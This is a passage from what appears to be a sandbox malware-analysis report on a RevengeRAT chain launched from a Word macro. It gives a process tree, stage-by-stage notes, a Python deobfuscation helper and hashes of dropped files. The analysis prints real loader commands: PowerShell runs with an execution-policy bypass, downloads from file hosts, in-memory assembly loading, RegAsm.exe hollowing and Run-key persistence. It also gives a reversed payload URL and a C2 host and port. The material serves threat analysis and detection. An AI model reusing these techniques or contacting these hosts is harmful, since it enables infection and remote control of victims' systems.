          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        powershell.exe (PID 568, child of 4320)
          powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\lngbo.ps1"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          RegAsm.exe (PID 1996, child of 568)
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            - System Location Discovery: System Language Discovery

        cmd.exe (PID 3684, child of 4320)
          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"

Notes on the chain as the report records it:
- Stage 1 (PID 3640, spawned by the Word macro) uses PowerShell's wget alias (Invoke-WebRequest) to fetch test.js from 4sync and hands the file to explorer.exe. Passing a file to explorer.exe opens it through the shell's default handler, so WScript.exe (PID 2076) appears under the COM-activated explorer.exe /factory instance (PID 4316), not under WINWORD.EXE; a detection that only looks at Word's direct children sees the first hop and nothing after it.
- Stage 3 (PID 64) reconstructs its script from base64 in which every 'B' has been replaced by '㍿', decodes it as UTF-16LE, substitutes the path of test.js for the placeholder %DCPJU%, and runs the result in a new powershell.exe (PID 4320).
- Stage 4 branches on the PowerShell version. The PowerShell 2 branch (the Windows 7 case) downloads an .msu from Google Drive (file id chosen by processor architecture), installs it with wusa.exe, copies test.js into the Startup folder, sleeps 180 seconds and forces a reboot; as written it references $URLKB, which is never assigned, and omits the $ on IzjAQ, so in this sample that branch is defective. The branch taken here disables TLS certificate validation, downloads DLL01.txt over FTP with the credentials listed under Malware Config, fetches the URL that file contains, restores the 'A' characters the hosted text replaces with '↓:↓', loads the bytes as a .NET assembly and calls ClassLibrary3.Class1.prFVI with three arguments: a URL written backwards, the path of test.js and the string 'true1'.
- The code loaded into PID 4320 then starts x2.ps1 (which writes the Run key under the name "Update Drivers NVIDEO_r"; the value's -Comman works because PowerShell accepts unambiguous parameter prefixes) and lngbo.ps1, which starts RegAsm.exe with no arguments and sets its thread context (PID 568 to 1996), the usual shape of a hollowed host process. RegAsm.exe is also the process performing the system-language lookup, and the stage-4 script deletes test.js afterwards. The RevengeRAT configuration under Malware Config (C2 marcelotatuape.ddns.net:333) was extracted from this run.
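The stage-3 and stage-4 commands above carry their strings through three cheap transforms: base64 of UTF-16LE text with every 'B' swapped for '㍿' (U+337F) and a %DCPJU% placeholder for the .js path; a downloaded base64 blob with every 'A' swapped for '↓:↓'; and a URL written backwards ('sptth' at its end). The Python below, an added example rather than tria.ge's or the sample's code, undoes each layer. Its fixtures are the first 24 characters of the blob in the process tree, the reversed string from stage 4, and a constructed four-byte assembly sample; encode_stage3 exists only to build a round-trip fixture. That the DLL simply reverses its first argument is an inference from the string itself, not from the DLL, which the report does not show.

```python
import base64
from urllib.parse import urlsplit, unquote

# Added example: decoders for the obfuscation layers visible in this report's
# process tree.  Not tria.ge code and not the sample's code.

SUB_FOR_B = "\u337f"          # '㍿': stage 3 swaps this in for every 'B'
SUB_FOR_A = "\u2193:\u2193"   # '↓:↓': the text fetched in stage 4 has this for every 'A'


def decode_stage3(blob, script_path, placeholder="%DCPJU%"):
    """Undo the stage-3 transform: restore 'B', base64-decode, read as UTF-16LE,
    then substitute the .js path the loader inserts for its placeholder."""
    raw = base64.b64decode(blob.replace(SUB_FOR_B, "B"))
    return raw.decode("utf-16-le").replace(placeholder, script_path)


def encode_stage3(script):
    """Inverse of decode_stage3; used here only to build a constructed fixture."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("B", SUB_FOR_B)


def decode_stage4_assembly(text):
    """Stage 4 fetches text whose base64 has 'A' replaced by '↓:↓' and loads the
    decoded bytes as a .NET assembly; this returns those bytes."""
    return base64.b64decode(text.replace(SUB_FOR_A, "A"))


def unreverse_url(arg):
    """The first argument to ClassLibrary3.Class1.prFVI reads as a URL written
    backwards.  Reversing it is an assumption about what the DLL does; the
    report does not show the DLL's code."""
    url = arg[::-1]
    parts = urlsplit(url)
    return {"url": url, "scheme": parts.scheme, "host": parts.hostname,
            "path": parts.path, "query": unquote(parts.query)}


# Fixtures: first 24 characters of the stage-3 blob and the stage-4 URL argument,
# both copied from the process tree; the assembly sample is constructed.
REPORT_STAGE3_PREFIX = "JA\u337fpAFUAbg\u337fKAGEAIAA9ACAA"
REPORT_PRFVI_ARG = ("22%96c853656b06a568db2c21ae6cbb215b22%=v&daolnwod=ecruos&txt.txt72%72%8-FTUD3%A2%"
                    "emanelif+B3%22%txt.txt22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?"
                    "txt.c8867050045c-0c7a-2894-b2a2-6391ed2d/gpEWJuQx/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth")
CONSTRUCTED_ASSEMBLY_TEXT = "TVqQ\u2193:\u2193\u2193:\u2193=="   # base64 of b'MZ\x90\x00' after the swap


if __name__ == "__main__":
    print(decode_stage3(REPORT_STAGE3_PREFIX, r"C:\Users\Admin\AppData\Local\Temp\test.js"))
    print(unreverse_url(REPORT_PRFVI_ARG)["url"])
    print(decode_stage4_assembly(CONSTRUCTED_ASSEMBLY_TEXT))
```

Running decode_stage3 over the whole blob from the tree reproduces the script shown under PID 4320; the prefix fixture alone yields its opening assignment.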
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Filesize: 132KB
MD5: 5d6acf998701782dbc41e3cca20839ae
SHA1: 8fa365fd0df099df35d06bc9178d435ad2a9f472
SHA256: e9732ebc6fee2eee5b41a6ab019c68acf833204545cfe8e51b9f5df910e9c40f
SHA512: 9da884483ae247825a9c5cca776cfe8674efae433ad82d17bbcef21349be1e9c51ca0101c5858be0deee5f1ccb72042ddecbfbd2523c34ab617cad15cb10fe93

Filesize: 334B
MD5: 80df14ed28f6bdea4bd049a6d865b97e
SHA1: 715dca5ecc3260c153d5e953cdc45be5a98e24b6
SHA256: 4ae4ca4102c4a50bad8663d8e1911a2b5c6c4eb8ebc7dcb46bf77418efddec16
SHA512: 8bfd60b774c966c8db42d0f66d9e1f13d074c201bbaf68b7c09f547485043033372e19696b53a82e5c6ee8eb2aad0a07173dd5ae58058f17bc574c57035a52e7

Filesize: 1KB
MD5: 0f6a3762a04bbb03336fb66a040afb97
SHA1: 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256: 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512: cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Filesize: 1KB
MD5: c1fca2f86da013ab0bebd174f313ee72
SHA1: d6b6a8f5d6d9979893254cea76f7031ba5438391
SHA256: 79f112792c2d79cd64d73d4510168f0dbe7d5a40877c6c305863c0a473dc01f9
SHA512: e5f2f2a6f4387d857b72cc44351e3e63b4d04958af6a269502f6ae5e5d68a5f9c3d9c9457dd1cbc99e080f858697df7430bed130b009f6fc133dbadf1df758be

Filesize: 64B
MD5: 87441260b5caf10b43d9846ab2240740
SHA1: f28038d1042410969b1b15aee5dd5f1ef6632688
SHA256: 186739f88588b68b398f84fd90e920e8faa68306e582970256572573595b4610
SHA512: 08fecb974f914e8b4ca37abcefb5a1473c9eb6ac558477ab94895ce19b20c7228807ecee1282cf21f1282cafd8d2a50ea06935b12488345204e5d201b651fefc

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 12KB
MD5: 1fb86474569cb04bd88f9421f0928f51
SHA1: 7c9f86002055e8468dd14da6dc4c63f03ac8e4a7
SHA256: 7f34301509d6975851c1cffedbce7b05b5e3549e2dbdd7f0f4a6dfa5900d83b1
SHA512: 3e24ab6ae2bdbd0729a1ee0aeba249dbaa94e0655d893662dd2b63ee030d2e043b79f324c743eaa6c8508140496021aa11e8d94c70e5cda89da725ce12aeda0f

Filesize: 2B
MD5: f3b25701fe362ec84616a93a45ce9998
SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize: 1KB
MD5: 1e7a0c0f85c6e3fbd2b26c2e3af83a8e
SHA1: e0dd300100c3ccc94bdb2f67900af9f879ffc936
SHA256: 89d7d6ffee09dcd2b3e9df93eedae098ec0e5e34f3326b3fbc5fc46c6ca5a92c
SHA512: 8f3eab8562e16f901b9aa2f21306d135e7b562586333a2111b2ce738c730424d194e8a8091e2fdde5a087b8c829625438d3ecca35a961bad900360ffe4a9acc4